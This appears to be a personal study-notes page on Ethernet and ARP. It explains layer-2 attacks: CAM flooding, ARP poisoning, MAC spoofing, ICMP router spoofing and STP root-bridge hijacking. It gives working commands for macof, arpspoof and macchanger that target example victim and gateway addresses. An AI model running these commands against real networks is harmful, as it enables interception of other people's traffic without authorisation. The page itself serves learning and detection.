Logo
RSS Feed

📚 Ethernet

Created: 29.11.2020

ARP Protocol

This is not a protocol of a data link layer of TCP/IP stack. It’s not on any layer per se. However, I’m putting this paragraph here because ARP is needed for filling in Ethernet header details.

Attacks

CAM (Content Addressable Memory) - switch keeps a record of all MACs of connected devices and their assigned virtual ports on that switch in a table:

MAC Switch port
1111:1111:0000:2222 12

Flooding with 1 MAC

Send lots of ARP reply to constantly update 1 entry (race condition). Whenever the MAC in CAM table is substututed with the attacker’s MAC, the responses will be redirected to the attacker. As soon as the victim sends a new request to some server through the switch, its MAC overwrites the attacker’s. So it looks like a battle for 1 “seat”.

Flooding with different random MACs

Turning switch into a hub by flooding it with lots of ARP reply sending lots of random addresses and overflowing the CAM table. Uncapable of coping with such a flood, the switch is turned into a hub.

# flood with random MACs
macof -i eth1 -n10 

# targeted flooding
macof -i eth1 -d 192.168.1.1

Span port

This is an option that can be turned on in the switch’s configs. Each request and response is copies and sent to the span port as well. Sometimes, switches only allow listening on the span port.

CISCO config example

monitor session 1 source interface fastethernet 0/1
- source port for monitoring
monitor session 1 destination interface fastethernet 0/24
- destination port 

ARP poisoning

This attack poisons an ARP cache of a target machine. If attacker succeeds in overwriting an ARP entry for the default gateway with its own MAC, all traffic will be redirectied to the attacker.

ARP cache is not the same as CAM table. 1

# flood Bob (192.168.1.4) with ARP replies stating that the attacker has 192.168.1.1
arpspoof -i eth0 -t 192.168.1.4 192.168.1.1
# ARP cache of 192.168.1.4 is now as follows: cc:cc:cc:cc:cc:cc = 192.168.1.1.

# flood the GW i.e. gateway (192.168.1.1) with ARP replies stating that the attacker has 192.168.1.4
arpspoof -i eth0 -t 192.168.1.1 192.168.1.4
# ARP cache of 192.168.1.1 is now as follows: cc:cc:cc:cc:cc:cc = 192.168.1.4.

MAC spoofing

Change the attacker’s original MAC to the victim’s locally. For example, in the registry on a Windows machine:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\4d36e972-e325-11ce-bfc1-08002be103d8 SMAC

Or in the command line (Linux):

# disconnect from wlan1
ifconfig wlan1 down 
# or
ip link set wlan1 down

# * optionally
# find MAC for specific vendor
macchanger -l 

# change mac for wlan1
macchanger -r wlan1
macchanger -m aa:bb:cc:dd:ee:ff

# connect to wlan1 with the new MAC
ifconfig wlan1 up
# or 
ip link set wlan1 up

IRDR spoofing

Send spoofed ICMP Router Discover Protocol advertising GW (gateway) to start routing through for victims.

STP-mangling

Attacker is elected as the new root bridge of the spanning tree:

  1. forge BPDUs (Bridge Protocol Data Unit) with high priority assuming to be the new root
  2. Broadcast STP Config/Topolgy Change ACK BPDUs to get his host elected as the new root bridge.

Being the bridge root Eve can intercept all traffic.

How to detect - http://www.firewall.cx/general-topics-reviews/network-protocol-analyzers/1113-capsa-network-analyzer-discover-arp-attacks-flooding.html